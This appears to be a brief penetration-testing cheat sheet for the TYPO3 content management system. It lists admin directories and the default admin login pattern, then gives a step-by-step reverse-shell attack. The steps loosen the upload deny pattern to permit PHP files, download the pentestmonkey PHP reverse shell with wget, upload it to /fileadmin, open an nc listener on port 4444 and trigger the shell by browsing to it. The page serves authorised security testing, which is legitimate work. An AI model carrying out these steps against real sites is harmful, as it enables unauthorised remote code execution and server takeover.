# TYPO3 Pentesting

TYPO3 is a web content management system. It can run on web servers like Apache, Nginx or IIS.

### Directory Discovery <a href="#directory-discovery" id="directory-discovery"></a>

```
/fileadmin/
/typo3/
/typo3conf/
/typo3temp/
```

### Default Credentials <a href="#default-credentials" id="default-credentials"></a>

```
admin:<password-specified-when-installed>
```

### Reverse Shell (Admin Credential Required) <a href="#reverse-shell-admin-credential-required" id="reverse-shell-admin-credential-required"></a>

First, to check and edit the configuration of the uploaded file extension, go to “ADMIN TOOLS” → “Configure Installation-Wide Options” → “Backend” → “fileDenyPattern”.\
Update the configuration if necessary. For example, remove “php\[1-9]?”

```
\.(phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$
```

Next, prepare the payload for reverse shell named “shell.php”.

```
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
```

Go to “FILE” → “Filelist” and upload the payload to the root of /fileadmin.\
Now you need to open listener for getting the shell.

```
nc -lvnp 4444
```

Then access to “/fileadmin/shell.php”. You should get the shell.